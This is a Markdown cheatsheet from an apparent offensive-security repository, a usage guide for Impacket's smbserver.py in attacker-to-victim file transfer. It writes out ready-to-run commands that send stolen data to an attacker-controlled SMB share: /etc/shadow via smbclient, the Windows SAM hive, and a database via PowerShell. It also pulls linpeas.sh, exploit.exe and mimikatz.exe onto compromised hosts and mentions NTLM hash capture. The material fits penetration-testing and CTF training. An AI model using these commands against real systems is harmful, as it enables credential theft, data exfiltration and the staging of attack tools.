daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

smbserver-py.md (3885B)


      1 ---
      2 title: "smbserver.py"
      3 description: "Run this on your attacking machine (macOS/Linux) to host the files."
      4 category: tools
      5 tags: ["tools"]
      6 tools: ["Impacket", "Mimikatz", "PowerShell"]
      7 difficulty: intermediate
      8 updated: "2026-08-10"
      9 source: "vault:Tools/smbserver.py.md"
     10 ---
     11 # 📂 Impacket smbserver.py Usage Guide
     12 
     13 > [!WARNING] macOS Users
     14 > Before running the server, ensure native **File Sharing** is turned **OFF** in System Settings, or you will get an `Address already in use` error on port 445.
     15 
     16 ## 1. Start the SMB Server (Attacker Machine)
     17 
     18 Run this on your attacking machine (macOS/Linux) to host the files.
     19 
     20 **The "Compatible" Command (Recommended)**
     21 This enables SMBv2 (for modern Windows) and sets a username/password to bypass "Guest Access" security policies.
     22 
     23 ```bash
     24 # Syntax: sudo smbserver.py <ShareName> <LocalDirectory> -smb2support -user <User> -password <Pass>
     25 sudo smbserver.py SHARE . -smb2support -user temp -password temp
     26 ```
     27 
     28 **The "Legacy" Command**
     29 Only use this for Windows XP / Server 2003 (SMBv1).
     30 ```bash
     31 sudo smbserver.py SHARE .
     32 ```
     33 
     34 ---
     35 
     36 ## 2. Transferring Files FROM Linux (Victim)
     37 
     38 Assuming you have a shell on a Linux victim and want to send files **TO** your `smbserver`.
     39 
     40 ### Method A: Using `smbclient` (Standard)
     41 Most common method. Does not require root.
     42 
     43 **Upload a file to your server:**
     44 ```bash
     45 # Syntax: smbclient //<AttackerIP>/<ShareName> -U <User> -c 'put <FileToSend>'
     46 smbclient //<AttackerIP>/SHARE -U temp -c 'put /etc/shadow'
     47 # Enter password 'temp' when prompted
     48 ```
     49 
     50 **Download a file from your server:**
     51 ```bash
     52 smbclient //<AttackerIP>/SHARE -U temp -c 'get linpeas.sh'
     53 ```
     54 
     55 ### Method B: Mounting (Requires Root)
     56 Mounts your share to a local folder on the victim.
     57 ```bash
     58 mkdir /tmp/transfer
     59 mount -t cifs //<AttackerIP>/SHARE /tmp/transfer -o username=temp,password=temp,vers=3.0
     60 
     61 # Now just copy files normally
     62 cp /root/proof.txt /tmp/transfer/
     63 ```
     64 
     65 ---
     66 
     67 ## 3. Transferring Files FROM Windows (Victim)
     68 
     69 Assuming you have a shell on a Windows victim and want to send files **TO** your `smbserver`.
     70 
     71 ### Method A: `net use` (Mount Drive)
     72 The most reliable method. Maps your share to a drive letter (e.g., `Z:`).
     73 
     74 1. **Connect:**
     75    ```cmd
     76    net use Z: \\<AttackerIP>\SHARE /user:temp temp
     77    ```
     78 2. **Transfer (Copy/Move):**
     79    ```cmd
     80    copy C:\Users\Administrator\Desktop\flag.txt Z:\
     81    move Z:\exploit.exe C:\Windows\Temp\
     82    ```
     83 3. **Disconnect:**
     84    ```cmd
     85    net use Z: /delete
     86    ```
     87 
     88 ### Method B: Direct Copy (UNC Path)
     89 Quick for single files without mounting a drive.
     90 ```cmd
     91 copy C:\Windows\System32\config\SAM \\<AttackerIP>\SHARE\SAM
     92 ```
     93 
     94 ### Method C: PowerShell
     95 If CMD is blocked or you prefer PS.
     96 ```powershell
     97 # Create credential object
     98 $pass = ConvertTo-SecureString "temp" -AsPlainText -Force
     99 $cred = New-Object System.Management.Automation.PSCredential("temp", $pass)
    100 
    101 # Copy to your server
    102 Copy-Item "C:\Secret\data.db" -Destination "\\<AttackerIP>\SHARE\data.db" -Credential $cred
    103 
    104 # Copy from your server
    105 Copy-Item "\\<AttackerIP>\SHARE\mimikatz.exe" -Destination "C:\Temp\" -Credential $cred
    106 ```
    107 
    108 ---
    109 
    110 ## ⚡ Cheat Sheet
    111 
    112 | Action | OS | Command |
    113 | :--- | :--- | :--- |
    114 | **Start Server** | Attacker | `sudo smbserver.py SHARE . -smb2support -user temp -password temp` |
    115 | **Start (Legacy)** | Attacker | `sudo smbserver.py SHARE .` |
    116 | **Mount Share** | Win Client | `net use Z: \\<IP>\SHARE /user:temp temp` |
    117 | **Unmount** | Win Client | `net use Z: /delete` |
    118 | **Quick Upload** | Win Client | `copy file.txt \\<IP>\SHARE\` |
    119 | **Quick Download** | Win Client | `copy \\<IP>\SHARE\file.exe .` |
    120 | **Upload** | Linux Client | `smbclient //<IP>/SHARE -U temp -c 'put file.txt'` |
    121 | **Download** | Linux Client | `smbclient //<IP>/SHARE -U temp -c 'get file.txt'` |
    122 | **NTLM Capture** | Attacker | Start server *without* `-user/-password`, then trigger any connection from Windows client. |
    123 ```